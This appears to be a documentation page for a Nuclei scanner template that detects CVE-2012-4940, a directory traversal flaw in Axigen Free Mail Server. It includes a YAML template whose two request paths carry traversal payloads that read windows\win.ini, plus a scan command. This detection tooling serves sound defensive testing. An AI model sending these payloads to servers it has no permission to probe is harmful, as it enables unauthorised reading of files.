Skip to content
Nuclei Templates

Axigen Mail Server Filename Directory Traversal

ID: CVE-2012-4940

Severity: medium

Author: dhiyaneshDk

Tags: cve,cve2012,edb,axigen,lfi,mail,gecad

Description

Section titled “Description”

Multiple directory traversal vulnerabilities in the View Log Files component in Axigen Free Mail Server allow remote attackers to read or delete arbitrary files via a .. (dot dot) in the fileName parameter in a download action to source/loggin/page_log_dwn_file.hsp, or the fileName parameter in an edit or delete action to the default URI.

YAML Source

Section titled “YAML Source”
id: CVE-2012-4940


info:
  name: Axigen Mail Server Filename Directory Traversal
  author: dhiyaneshDk
  severity: medium
  description: Multiple directory traversal vulnerabilities in the View Log Files component in Axigen Free Mail Server allow remote attackers to read or delete arbitrary files via a .. (dot dot) in the fileName parameter in a download action to source/loggin/page_log_dwn_file.hsp, or the fileName parameter in an edit or delete action to the default URI.
  impact: |
    An attacker can read sensitive files, potentially leading to unauthorized access, data leakage, or further compromise of the server.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in Axigen Mail Server.
  reference:
    - https://www.exploit-db.com/exploits/37996
    - https://nvd.nist.gov/vuln/detail/CVE-2012-4940
    - http://www.kb.cert.org/vuls/id/586556
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:N
    cvss-score: 6.4
    cve-id: CVE-2012-4940
    cwe-id: CWE-22
    epss-score: 0.16414
    epss-percentile: 0.95998
    cpe: cpe:2.3:a:gecad:axigen_free_mail_server:-:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: gecad
    product: axigen_free_mail_server
  tags: cve,cve2012,edb,axigen,lfi,mail,gecad


http:
  - method: GET
    path:
      - '{{BaseURL}}/?h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf&action=edit&fileName=..\..\..\windows\win.ini'
      - '{{BaseURL}}/source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..\..\..\windows\win.ini'


    stop-at-first-match: true
    matchers:
      - type: word
        part: body
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and
# digest: 4a0a00473045022100ede406fb47b3b47c2691f736760f6b9d037ec2d14d86fb0d4ef0f947a1a3dcbf022007f2e95c7bd9547befc1b221f66fb224adde12fc18fa4f3b64417b059c079cab:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2012/CVE-2012-4940.yaml"

View on Github